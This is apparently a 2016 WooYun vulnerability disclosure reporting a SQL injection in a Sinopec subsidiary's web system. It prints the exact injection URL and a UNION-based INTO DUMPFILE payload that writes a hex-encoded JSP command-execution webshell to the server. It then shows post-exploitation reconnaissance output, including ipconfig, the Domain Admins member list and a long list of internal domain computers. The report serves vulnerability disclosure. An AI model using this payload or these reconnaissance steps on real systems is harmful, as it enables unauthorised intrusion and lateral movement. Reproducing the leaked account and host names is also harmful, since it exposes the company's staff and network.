当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0206439

漏洞标题:中国石化某直属单位某系统SQL注入/getshell/域网几千台主机沦陷

相关厂商:中国石油化工股份有限公司

漏洞作者: obanions

提交时间:2016-05-08 17:11

修复时间:2016-06-23 11:10

公开时间:2016-06-23 11:10

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开

简要描述:

rt

详细说明:

中石化南京工程有限公司(SINOPEC NANJING ENGINEERING &CONSTRUCTION INCORPORATION,简称SNEI)是中石化炼化工程(集团)股份有限公司直属企业。是以设计为先导,专利、专有技术、工艺包开发为核心,工程总承包和项目管理、专业施工为主体、面向国内外市场提供技术和管理服务的综合性、一体化的国际工程公司。
主页:http://www.snei.com.cn/
问题站点:http://v2.snei.com.cn/
注入点:http://v2.snei.com.cn//Conf/jsp/systembulletin/bulletinAction.dooperator=details
post
sysid=-1 union 注入
利用该注入直接写入shell
ysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23
上个菜刀马 index_cd.jsp

63.png


看下是不是在域里

C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> ipconfig /all
Windows IP 配置
   主机名  . . . . . . . . . . . . . : v2svr1
   主 DNS 后缀 . . . . . . . . . . . : snei.com.cn
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : snei.com.cn
以太网适配器 本地连接 4:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-D0
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
以太网适配器 本地连接 3:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CF
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
以太网适配器 本地连接 2:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : snei.com.cn
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CD
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CE
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::296e:f2cc:6642:2235%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.150.1.48(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.150.1.250
   DHCPv6 IAID . . . . . . . . . . . : 248819282
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1E-AA-0F-DD-D4-AE-52-9D-E3-CE
   DNS 服务器  . . . . . . . . . . . : 10.150.1.30
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
隧道适配器 isatap.{18F0418B-44BA-4EB7-BD31-A8BF6B32DD99}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{07D98EBF-A6F2-46EC-9899-12F2CEA8CB4A}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.snei.com.cn:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{D56D1E3E-BAA0-49D7-8060-AC6FE8375B0E}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是


domain:snei.com.cn
看下域管理员组

C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> net group "domain admins" /domain
这项请求将在域 snei.com.cn 的域控制器处理。
组名     Domain Admins
注释     指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator            chujing                  dnsmgmt                  
fsvr                     gcxmdns                  huangjk                  
NJGC-VMM-Admin           snei-jm                  snei-virtual             
snei-xxgl01              wangjian07               zhust                    
命令成功完成。


域内主机2000多台

C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> net group "domain computers" /domain
这项请求将在域 snei.com.cn 的域控制器处理。
组名     Domain Computers
注释     加入到域中的所有工作站和服务器
成员
-------------------------------------------------------------------------------
20110613-1620$           360FBDSVR$               5M5VYOP5317FUJA$         
ADMIN-PC$                AP9QKUVLTJJSLBB$         APP$                     
APP-V1$                  APPV2$                   APPV3$                   
APPV4$                   APPV5$                   AZGCFGS002$              
AZGCFGS218$              BAOWEICHU-YHM$           BESSER-LH-NJGC$          
BHDELLWKS1$              BHDELLWKS2$              BHDELLWKS3$              
BHDELLWKS333$            BHPDSSVR$                BIAIMIN-NB$              
BIANDONG-NB$             BJ-1-002$                BLACKWKS0082$            
BWC-YHM$                 CAIRUICHENG-NB$          CAIZR-NB$                
CGGCFGS011$              CGGCFGS018$              CGGCFGS021$              
CGGCFGS025$              CGGCFGS029$              CGGCFGS033$              
CGGCFGS034-NB$           CGGCFGS040$              CGGCFGS042$              
CGGCFGS044$              CGGCFGS045$              CGGCFGS048$              
CGGCFGS053$              CGGCFGS055$              CGGCFGS059$              
CGGCFGS061$              CGGCFGS066$              CGGCFGS081$              
CGGCFGS085$              CGGCFGS086$              CGGCFGS090$              
CGGCFGS094$              CGGCFGS095$              CGGCFGS105$              
CGGCFGS112$              CGGCFGS113$              CGGCFGS114$              
CGGCFGS115$              CGGCFGS116$              CGGCFGS120$              
CGGCFGS121$              CGGCFGS300$              CGGCFGS301-NB$           
CGGCFGS303$              CGGCFGS304$              CGGCFGS305$              
CGGCFGS306$              CGGCFGS307$              CGGCFGS308$              
CGGCFGS309$              CGGCFGS310$              CGGCFGS311$              
CGGCFGS312$              CGGCFGS313$              CGGCFGS314$              
CGGCFGS315$              CGGSFGS099$              CHENJUNLS$               
CHENRB-NB$               COMOS1$                  COMOSSVR1$               
CYGCFGS-YUANQIO$         DATABASE$                DCGCFGS354$              
DELL-0185$               DELLWKS000$              DELLWKS0118$             
DELLWKS0119$             DELLWKS0121$             DELLWKS0129$             
DELLWKS0133$             DELLWKS0134$             DELLWKS0135$             
DELLWKS0137$             DELLWKS0138$             DELLWKS0143$             
DELLWKS0149$             DELLWKS0156$             DELLWKS0159$             
DELLWKS0161$             DELLWKS0163$             DELLWKS0165$             
DELLWKS0170$             DELLWKS0171$             DELLWKS0172$             
DELLWKS0175$             DELLWKS0176$             DELLWKS0179$             
DELLWKS0182$             DELLWKS0187$             DELLWKS0194$             
DELLWKS0195$             DELLWKS0198$             DELLWKS0202$             
DELLWKS0204$             DELLWKS0207$             DELLWKS0209$             
DELLWKS0210$             DELLWKS0212$             DELLWKS0213$             
DELLWKS0214$             DELLWKS0225$             DELLWKS0228$             
DELLWKS0230$             DELLWKS0237$             DELLWKS0237-ZHS$         
DELLWKS0246$             DELLWKS0247$             DELLWKS0252$             
DELLWKS0253$             DELLWKS0255$             DELLWKS0256$             
DELLWKS0257$             DELLWKS0259$             DELLWKS0260$             
DELLWKS0261$             DELLWKS0263$             DELLWKS0265$             
DELLWKS0266$             DELLWKS0267$             DELLWKS0268$             
DELLWKS0269$             DELLWKS0277$             DELLWKS0278$             
DELLWKS0279$             DELLWKS0282$             DELLWKS120$              
DELLWKS133$              DELLWKS135$              DELLWKS140$              
DELLWKS143$              DELLWKS145$              DELLWKS146$              
DELLWKS147$              DELLWKS148$              DELLWKS149$              
DELLWKS152$              DELLWKS153$              DELLWKS154$              
DELLWKS155$              DELLWKS156$              DELLWKS157$              
DELLWKS158$              DELLWKS160$              DELLWKS161$              
DELLWKS162$              DELLWKS163$              DELLWKS164$              
DELLWKS165$              DELLWKS167$              DELLWKS168$              
DELLWKS198$              DELLWKS20200$            DELLWKS20201$            
DELLWKS20202$            DELLWKS20203$            DELLWKS20204$            
DELLWKS20205$            DELLWKS20206$            DELLWKS20207$            
DELLWKS20208$            DELLWKS20209$            DELLWKS20210$            
DELLWKS346$              DELLWKS-NDA0197$         DEVELOP1$                
DEVELOP2$                DINGSK$                  DUJIE-NBLS$              
DYCFGS168$               DYGCFGS002$              DYGCFGS003$              
DYGCFGS004$              DYGCFGS005$              DYGCFGS006$              
DYGCFGS007$              DYGCFGS008$              DYGCFGS010$              
DYGCFGS011$              DYGCFGS013$              DYGCFGS014$              
DYGCFGS015$              DYGCFGS016$              DYGCFGS017$              
DYGCFGS019$              DYGCFGS020$              DYGCFGS021$              
DYGCFGS022$              DYGCFGS025$              DYGCFGS027$              
DYGCFGS028$              DYGCFGS029$              DYGCFGS030$              
DYGCFGS032$              DYGCFGS033$              DYGCFGS034$              
DYGCFGS036$              DYGCFGS037$              DYGCFGS038$              
DYGCFGS067$              DYGCFGS093$              DYGCFGS095-NBLS$         
DYGCFGS124$              DYGCFGS132-NBLS$         DYGCFGS136$              
DYGCFGS137$              DYGCFGS141$              DYGCFGS155$              
DYGCFGS166$              DYGCFGS168$              DYGCFGS300$              
DYGCFGS301$              DYGCFGS302$              DYGCFGS303$              
DYGCFGS304$              DYGCFGS305$              DYGCFGS306$              
DYGCFGS307$              DYGCFGS350$              DYGCFGS351$              
DYGCFGS352$              DYGCFGS353$              DYGCFGS354$              
DYGCFGS355$              DYGCFGS356$              DYGCFGS357$              
DYGCFGS358$              DYGCFGS359$              DYGCFGS360$              
DYGCFGS361$              EDMSADTS$                EDMSCS$                  
EDMSIDX$                 ETHER2008$               FAS2240-1$               
FAS2240-2$               FDSVR01$                 FILESHARESVR1$           
GAOYONGGANG-NB$          GCXMGLFGS001$            GCXMGLFGS002$            
GCXMGLFGS003$            GCXMGLFGS004$            GCXMGLFGS005$            
GCXMGLFGS007$            GCXMGLFGS008$            GCXMGLFGS009$            
GCXMGLFGS011$            GCXMGLFGS013$            GCXMGLFGS014$            
GCXMGLFGS017$            GCXMGLFGS023$            GCXMGLFGS024$            
GCXMGLFGS025$            GCXMGLFGS026-01$         GCXMGLFGS027$            
GCXMGLFGS027-1$          GCXMGLFGS028$            GCXMGLFGS029$            
GCXMGLFGS030$            GCXMGLFGS031$            GCXMGLFGS032$            
GCXMGLFGS033$            GCXMGLFGS100$            GDCGFGS017$              
GDGCFGS001$              GDGCFGS002$              GDGCFGS003$              
GDGCFGS006$              GDGCFGS007$              GDGCFGS008$              
GDGCFGS009$              GDGCFGS010$              GDGCFGS011$              
GDGCFGS012$              GDGCFGS013$              GDGCFGS014$              
GDGCFGS015$              GDGCFGS016$              GDGCFGS017$              
GDGCFGS018$              GDGCFGS019$              GDGCFGS020$              
GDGCFGS023$              GDGCFGS026$              GDGCFGS027$              
GDGCFGS028$              GDGCFGS029$              GDGCFGS030$              
GDGCFGS031$              GDGCFGS032$              GDGCFGS033$              
GDGCFGS036$              GDGCFGS039$              GDGCFGS043$              
GDGCFGS051$              GDGCFGS054$              GDGCFGS063$              
GDGCFGS064$              GDGCFGS066$              GDGCFGS067$              
GDGCFGS070$              GDGCFGS090$              GDGCFGS093$              
GDGCFGS123$              GDGCFGS124$              GDGCFGS125$              
GDGCFGS300$              GDGCFGS301$              GDGCFGS302$              
GDGCFGS303$              GDGCFGS304$              GDGCFGS305$              
GDGCFGS306$              GDGCFGS307$              GDGCFGS308$              
GDGCFGS309$              GDGCFGS310$              GDGCFGS311$              
GDGCFGS312$              GDGCFGS313$              GDGCFGS314$              
GDGCFGS315$              GDGCFGS350$              GDWKS01$                 
GDWKS02$                 GENERAL-PRINT$           GLGY$                    
H28-SUNXIAORONG$         H29-ZHANGHONG01$         HANGUANG-NB$             
HE47-GEHUA$              HE47-LIULAN$             HEJIANHUA-7$             
HEJIANHUALS$             HERONGQUAN-NB$           HESHAN-NBLS$             
HG06-052$                HJK000$                  HJK0001$                 
HJK0002$                 HJK003$                  HJK-VMM$                 
HOUQB-NBLS$              HOUXB-NBLS$              HP25-056$                
HQ00-001$                HQ00-002$                HQ00-003$                
HQ00-004$                HQ00-005$                HQ00-007$                
HQ00-008$                HQ00-009$                HQ00-010$                
HQ00-012$                HQ00-013$                HQ00-015$                
HQ00-016$                HQ00-017$                HQ00-018$                
HQ00-020$                HQ00-021$                HQ00-022$                
HQ00-023$                HQ00-024$                HQ00-025$                
HQ00-026$                HQ00-027$                HQ00-028$                
HQ00-030$                HQ00-033$                HQ00-035$                
HQ00-036$                HQ00-042$                HQ00-043$                
HQ00-046$                HQ00-047$                HQ00-048$                
HQ00-049$                HQ00-050$                HQ00-051$                
HQ00-052$                HQ00-053$                HQ00-054$                
HQ00-055$                HQ00-055NB$              HQ00-056$                
HQ00-057$                HQ00-058$                HQ-002-NB$               
HQ00-50$                 HQ00-BIHUA$              HQ00-DAISL$              
HQ00-SHIFY$              HQ00-ZHOUYG$             HQ00-ZHUNQ$              
HQ01-001$                HQ01-002$                HQ01-003$                
HQ01-004$                HQ01-005$                HQ01-006$                
HQ01-007$                HQ01-008$                HQ01-009$                
HQ01-010$                HQ02-001$                HQ02-001-NB01$           
HQ02-001-NB02$           HQ02-002$                HQ02-002NB$              
HQ02-003$                HQ02-004$                HQ02-004-01$             
HQ02-005$                HQ02-006$                HQ02-007$                
HQ02-008$                HQ02-009$                HQ02-009VM$              
HQ02-010$                HQ02-012$                HQ02-013$                
HQ02-014$                HQ02-015$                HQ02-018$                
HQ02-019$                HQ02-021$                HQ02-021LS$              
HQ02-023$                HQ02-025$                HQ02-026$                
HQ02-028$                HQ02-029$                HQ02-030$                
HQ02-031$                HQ02-032$                HQ02-033$                
HQ02-034$                HQ02-035$                HQ02-036$                
HQ02-037$                HQ02-038$                HQ02-039$                
HQ02-040$                HQ02-041$                HQ02-042$                
HQ02-043$                HQ02-044NB$              HQ02-045NB$              
HQ02-046$                HQ02-047$                HQ02-048$                
HQ02-049$                HQ02-050$                HQ02-051$                
HQ02-053$                HQ02-054$                HQ02-057$                
HQ02-058$                HQ02-059$                HQ02-060$                
HQ02-065$                HQ02-067$                HQ02-068$                
HQ02-069$                HQ02-LIGANG01$           HQ02-LIUJX$              
HQ02-ZHOUXW$             HQ03-001$                HQ03-001-NB$             
HQ03-002$                HQ03-003$                HQ03-004$                
HQ03-005$                HQ03-006$                HQ03-007$                
HQ03-008$                HQ03-009$                HQ03-011$                
HQ03-012$                HQ03-013$                HQ03-014$                
HQ03-015$                HQ03-016$                HQ03-017$                
HQ03-018$                HQ03-020$                HQ03-021$                
HQ03-022$                HQ03-023$                HQ03-023NBLS$            
HQ03-024$                HQ03-025$                HQ03-026$                
HQ03-027$                HQ03-028$                HQ03-12$                 
HQ03-ZHOUXF$             HQ04-001$                HQ04-002$                
HQ04-003$                HQ04-004$                HQ04-004-1$              
HQ04-005$                HQ04-006$                HQ04-007$                
HQ04-008$                HQ04-009$                HQ04-010$                
HQ04-011$                HQ04-015$                HQ04-QURR1$              
HQ05-001$                HQ05-002$                HQ05-003$                
HQ05-004$                HQ05-005$                HQ05-006$                
HQ05-MAOHF$              HQ06-001$                HQ06-001NB$              
HQ06-003$                HQ06-004$                HQ06-005$                
HQ06-006$                HQ06-007$                HQ06-007YHM$             
HQ06-008$                HQ06-009$                HQ06-010$                
HQ06-011$                HQ06-012$                HQ06-013$                
HQ06-014$                HQ06-015NB$              HQ06-016$                
HQ06-017$                HQ06-018$                HQ06-019$                
HQ06-020$                HQ06-0201$               HQ06-020-OLD$            
HQ06-021$                HQ06-022$                HQ06-023$                
HQ06-024$                HQ06-028$                HQ06-029$                
HQ06-029NB$              HQ06-030$                HQ06-031$                
HQ06-032$                HQ06-033$                HQ06-034$                
HQ06-034NB$              HQ06-038$                HQ06-039$                
HQ06-040$                HQ06-041$                HQ06-042$                
HQ06-043$                HQ06-044$                HQ06-045$                
HQ06-046$                HQ06-047$                HQ06-048$                
HQ06-050$                HQ06-051$                HQ06-052$                
HQ06-053$                HQ06-054$                HQ06-055$                
HQ06-056$                HQ06-057$                HQ06-058$                
HQ06-060$                HQ06-062$                HQ06-064$                
HQ06-065$                HQ06-067$                HQ06-068$                
HQ06-069$                HQ06-071$                HQ06-072$                
HQ06-099$                HQ06-100$                HQ06-16$                 
HQ06-240$                HQ06-42$                 HQ06-59$                 
HQ06-CHUJING$            HQ06-LIUWLONG$           HQ06-LIXIN$              
HQ06-SIYU$               HQ06-TANGZYAN$           HQ06-YAOXIN$             
HQ06-YHM01$              HQ06-YHM02$              HQ06-ZHANGXIA$           
HQ06-ZHAOHL$             HQ06-ZHUANGPING$         HQ06-ZHUST$              
HQ07-002$                HQ07-003$                HQ07-004$                
HQ07-005$                HQ07-009$                HQ07-020$                
HQ07-045$                HQ07-CAIHM$              HQ08-001$                
HQ08-002$                HQ08-003$                HQ08-004$                
HQ08-005$                HQ08-006$                HQ08-007$                
HQ08-008$                HQ08-LIUXL$              HQ09-001$                
HQ09-006$                HQ09-009$                HQ09-020$                
HQ09-HUBB$               HQ10-002$                HQ10-002BN$              
HQ10-003$                HQ10-005$                HQ10-006$                
HQ10-007$                HQ10-008$                HQ10-010$                
HQ10-011$                HQ10-014$                HQ10-015$                
HQ10-016$                HQ10-017$                HQ10-018$                
HQ10-019$                HQ10-019NB$              HQ10-020$                
HQ10-021$                HQ10-023$                HQ10-023NBLS$            
HQ10-024$                HQ10-025$                HQ10-026$                
HQ10-027$                HQ10-028$                HQ10-030$                
HQ10-KANGSZ$             HQ10-PANHXIN$            HQ10-SHIHY$              
HQ10-XIEZQ$              HQ10-YANJIE$             HQ11-002$                
HQ11-003$                HQ11-008$                HQ11-009$                
HQ11-010$                HQ11-011$                HQ11-012$                
HQ11-013$                HQ11-014$                HQ11-016$                
HQ11-016NB$              HQ11-019$                HQ11-019NB$              
HQ11-020$                HQ11-021$                HQ11-023$                
HQ11-024$                HQ11-025$                HQ11-026$                
HQ11-027$                HQ11-028$                HQ11-029$                
HQ11-030$                HQ11-031$                HQ11-032$                
HQ11-033$                HQ11-05$                 HQ11-17$                 
HQ11-18$                 HQ11-FANGBIN$            HQ11-LIUYJZ$             
HQ11-YUSM$               HQ12-001$                HQ12-005$                
HQ12-009$                HQ12-011$                HQ12-012$                
HQ12-012NBLS$            HQ12-013$                HQ12-014$                
HQ12-015$                HQ12-017$                HQ12-018$                
HQ12-019$                HQ12-020$                HQ12-021$                
HQ12-022$                HQ12-CHENCM$             HQ12-LIUCHAO$            
HQ12-TIANYING$           HQ13-001$                HQ13-001NB$              
HQ13-002$                HQ13-003$                HQ13-004$                
HQ13-005$                HQ13-006$                HQ13-007$                
HQ13-008$                HQ13-009$                HQ13-010$                
HQ13-011$                HQ13-013$                HQ13-014$                
HQ13-015$                HQ13-016$                HQ13-017$                
HQ13-018$                HQ13-019$                HQ13-020$                
HQ13-021$                HQ13-023$                HQ13-024$                
HQ13-025$                HQ13-026$                HQ13-027$                
HQ13-028$                HQ13-030$                HQ13-031$                
HQ13-032$                HQ13-033$                HQ13-035$                
HQ13-036$                HQ13-037$                HQ13-040$                
HQ13-042$                HQ13-043$                HQ13-044$                
HQ13-045$                HQ13-046$                HQ13-047$                
HQ13-048$                HQ13-049$                HQ13-050$                
HQ13-051$                HQ13-052$                HQ13-053$                
HQ13-054$                HQ13-055$                HQ13-056$                
HQ13-057$                HQ13-058$                HQ13-059$                
HQ13-060$                HQ13-061$                HQ13-062$                
HQ13-099$                HQ13-SHENBM$             HQ13-SHISH$              
HQ13-ZHOUMING$           HQ14-001$                HQ14-002$                
HQ14-003$                HQ14-004$                HQ14-004NB$              
HQ14-005$                HQ14-006$                HQ14-007$                
HQ14-008$                HQ14-009$                HQ14-010$                
HQ14-011$                HQ14-012$                HQ14-013$                
HQ15-002$                HQ15-003$                HQ15-004$                
HQ15-005$                HQ15-007$                HQ15-008$                
HQ15-010$                HQ15-011$                HQ15-012$                
HQ15-013$                HQ15-014$                HQ15-017$                
HQ15-018$                HQ15-020$                HQ15-021$                
HQ15-022$                HQ15-026$                HQ15-028$                
HQ15-034$                HQ15-035$                HQ15-036$                
HQ15-037$                HQ15-038$                HQ15-039$                
HQ15-040$                HQ15-041$                HQ15-045$                
HQ15-046$                HQ15-048$                HQ15-049$                
HQ15-050$                HQ15-051$                HQ15-052$                
HQ15-053$                HQ15-055$                HQ15-056$                
HQ15-057$                HQ15-058$                HQ15-058NB$              
HQ15-059$                HQ15-060$                HQ15-066$                
HQ15-067$                HQ15-068$                HQ15-069$                
HQ15-070$                HQ15-071$                HQ15-072$                
HQ15-073$                HQ15-074$                HQ15-075$                
HQ15-077$                HQ15-078$                HQ15-079$                
HQ15-081$                HQ15-082$                HQ15-083$                
HQ15-084-NB$             HQ15-085$                HQ15-086$                
HQ15-087$                HQ15-090$                HQ15-091$                
HQ15-092$                HQ15-1467923$            HQ15-BAOJIE$             
HQ15-DAIZHAO$            HQ15-DTLS$               HQ15-DUJIE$              
HQ15-LIUHS$              HQ15-LIUJUN$             HQ15-SUNXF$              
HQ15-WANGJB$             HQ15-YUXB$               HQ16-001$                
HQ16-002$                HQ16-003$                HQ16-004$                
HQ16-006$                HQ16-007$                HQ16-008$                
HQ16-009$                HQ16-010$                HQ16-011$                
HQ16-012$                HQ16-014$                HQ16-015$                
HQ16-016$                HQ16-017$                HQ16-018$                
HQ16-019$                HQ16-020$                HQ16-021$                
HQ16-023$                HQ16-024$                HQ16-025$                
HQ16-026$                HQ16-100$                HQ16-HUANGHQ$            
HQ16-LIANGZW$            HQ16-MAOHF$              HQ17-002$                
HQ17-003$                HQ17-004$                HQ17-005$                
HQ17-006$                HQ17-007$                HQ17-008$                
HQ17-010$                HQ17-015$                HQ17-023$                
HQ17-025$                HQ17-026NB$              HQ17-028$                
HQ17-029$                HQ17-030$                HQ17-031$                
HQ17-032$                HQ17-033$                HQ17-036$                
HQ17-037$                HQ17-DONGNN$             HQ17-LIBJ$               
HQ17-LIUCZ$              HQ17-LIYG$               HQ17-MAJIONG$            
HQ18-001$                HQ18-002$                HQ18-002NB$              
HQ18-004$                HQ18-005$                HQ18-006$                
HQ18-008$                HQ18-009$                HQ18-014$                
HQ18-015$                HQ18-016$                HQ18-017$                
HQ18-018$                HQ18-019$                HQ18-021$                
HQ18-022$                HQ18-023$                HQ18-JIANGCM$            
HQ18-JIANGLI01$          HQ18-NIUXIAN$            HQ18-QIANLEI$            
HQ18-YANGYL$             HQ18-YULH$               HQ18-ZHANGRH$            
HQ19-001$                HQ19-002$                HQ19-003$                
HQ19-004$                HQ19-005$                HQ19-006$                
HQ19-007$                HQ19-008$                HQ19-010$                
HQ19-011$                HQ19-013$                HQ19-014$                
HQ19-015$                HQ19-016$                HQ19-018$                
HQ19-019$                HQ19-GUYONG$             HQ19-LIUMD$              
HQ19-ZHANGLXION$         HQ20-001$                HQ20-002NB$              
HQ20-003$                HQ20-004$                HQ20-005$                
HQ20-006$                HQ20-007$                HQ20-008$                
HQ20-014$                HQ20-015$                HQ20-016$                
HQ20-017$                HQ20-018$                HQ20-021$                
HQ20-022$                HQ20-023$                HQ20-024$                
HQ20-025$                HQ20-026$                HQ20-027$                
HQ20-028$                HQ20-029$                HQ20-030$                
HQ20-031$                HQ20-032$                HQ20-033$                
HQ20-040$                HQ20-ZHANGJQ$            HQ21-001$                
HQ21-002$                HQ21-003$                HQ21-004$                
HQ21-005$                HQ21-006$                HQ21-01467868$           
HQ21-101$                HQ21-102$                HQ21-103$                
HQ21-LIUDY$              HQ21-YAOZG$              HQ22-001$                
HQ22-002$                HQ22-003$                HQ22-004$                
HQ22-005$                HQ22-008$                HQ22-009$                
HQ22-010$                HQ23-001$                HQ23-002$                
HQ23-003$                HQ23-004$                HQ23-005$                
HQ23-006$                HQ23-007$                HQ24-002$                
HQ24-003$                HQ24-004$                HQ24-009$                
HQ24-010$                HQ24-011$                HQ24-012$                
HQ24-013$                HQ24-015$                HQ24-016$                
HQ24-017$                HQ24-022$                HQ24-024$                
HQ24-025$                HQ24-026$                HQ24-028$                
HQ24-029$                HQ24-030$                HQ24-033$                
HQ24-035$                HQ24-036$                HQ24-039$                
HQ24-040$                HQ24-042$                HQ24-044$                
HQ24-045$                HQ24-046$                HQ24-047$                
HQ24-048$                HQ24-049$                HQ24-052$                
HQ24-056$                HQ24-058$                HQ24-059$                
HQ24-061$                HQ24-062$                HQ24-063$                
HQ24-065$                HQ24-066$                HQ24-067$                
HQ24-068$                HQ24-070$                HQ24-072$                
HQ24-073$                HQ24-074$                HQ24-075$                
HQ24-076$                HQ24-077$                HQ24-078$                
HQ24-079$                HQ24-081$                HQ24-082$                
HQ24-084$                HQ24-085$                HQ24-086$                
HQ24-087$                HQ24-090$                HQ24-091$                
HQ24-093$                HQ24-094$                HQ24-095$                
HQ24-096$                HQ24-097$                HQ24-098$                
HQ24-099$                HQ24-100$                HQ24-101$                
HQ24-102$                HQ24-103$                HQ24-104$                
HQ24-105$                HQ24-106$                HQ24-109$                
HQ24-110$                HQ24-112$                HQ24-113$                
HQ24-114$                HQ24-115$                HQ24-116$                
HQ24-117$                HQ24-118$                HQ24-119$                
HQ24-120$                HQ24-121$                HQ24-122$                
HQ24-124$                HQ24-125$                HQ24-126$                
HQ24-127$                HQ24-128$                HQ24-129$                
HQ24-130$                HQ24-131$                HQ24-133$                
HQ24-134$                HQ24-135$                HQ24-136$                
HQ24-137$                HQ24-138$                HQ24-139$                
HQ24-140$                HQ24-141$                HQ24-142$                
HQ24-143$                HQ24-144$                HQ24-145$                
HQ24-146$                HQ24-147$                HQ24-148$                
HQ24-150$                HQ24-151$                HQ24-152$                
HQ24-153$                HQ24-177$                HQ24-189$                
HQ24-190$                HQ24-82$                 HQ24-GYSGY03$            
HQ24-GYSGY04$            HQ24-JIANGGS$            HQ24-JIANGSJ$            
HQ24-LINA01$             HQ24-LUZY$               HQ24-QIJW$               
HQ24-SHIYONG$            HQ24-XUEBAI$             HQ24-YANJS$              
HQ24-ZENGMING$           HQ24-ZHANGTING$          HQ24-ZHAOYC$             
HQ25-001$                HQ25-002$                HQ25-002BJB$             
HQ25-003$                HQ25-004$                HQ25-005$                
HQ25-008$                HQ25-009$                HQ25-0101$               
HQ25-013$                HQ25-014$                HQ25-01468010$           
HQ25-015$                HQ25-016$                HQ25-017$                
HQ25-0191$               HQ25-020$                HQ25-020V$               
HQ25-021$                HQ25-022$                HQ25-023$                
HQ25-024$                HQ25-025$                HQ25-026$                
HQ25-026NB$              HQ25-028$                HQ25-029$                
HQ25-030$                HQ25-031$                HQ25-032$                
HQ25-033$                HQ25-035$                HQ25-037$                
